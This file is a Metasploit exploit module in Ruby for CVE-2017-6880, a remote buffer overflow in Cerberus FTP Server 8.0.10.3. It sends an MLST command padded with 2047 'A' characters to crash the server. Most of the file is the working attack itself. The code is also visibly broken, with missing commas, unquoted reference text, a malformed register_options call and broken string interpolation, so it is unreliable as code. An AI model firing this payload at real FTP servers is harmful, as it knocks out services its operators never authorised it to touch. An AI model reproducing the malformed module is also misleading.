cerberftp_bof.rb

#!/usr/share/ruby

#[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
#[+] Credits / Discovery: Nassim Asrir
#[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
#[+] Metasploit Module Author : Souhardya Sardar 
#[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com
#[+] Author Company: Henceforth
#[+] CVE: CVE-2017-6880

#Vendor:
#===============
# 
#https://www.cerberusftp.com/
   
  
#Download:
#===========
# 
#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
  
  
#Vulnerability Type:
#===================
# 
#Remote Buffer Overflow.



# ----------------------------
# Module Dependencies/requires
# ----------------------------

require 'msf/core'

# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::Ftp

# -----------------------------------------
# Initialize information
# -----------------------------------------
    
    def initialize(info = {})
        super(update_info(info, 
            'Name'           => 'Cerber FTP Remote Buffer Overflow ',
            'Description'    => %q{
                    This module exploits a buffer overflow in the Cerber FTP client that is triggered
                by sending a bad char "A" in the command "MLST" (2047) .
            },
            
            'Author'        =>
                            [
                                        'Module Author And Bug Discovered by : Nassir', 
                                        'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :)
                                        'Thanks to : Nidhish Pandya ', #auditing:)
                                
                            
                            ],
            'License'        => NONE,
            'Platform'       => ['win']
            
            'References'     =>
                [
                    [ 'CVE', 'CVE-2017-6880' ],
                    [ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ]  
                  
                ]))
             
            register_optionsOptPort.new('SRVPORT', [true, "The remote FTP server port", 21])
    ], self.class)
            deregister_options('FTPUSER', 'FTPPASS')
    end

    def exploit
        connect
 
        payload = "A"*2047
 
        print_status("Trying to connect to target server {target.name...")

        
        sock.put('MLST ' + payload + '\r\n')
 
        handler
        disconnect
    end
 
end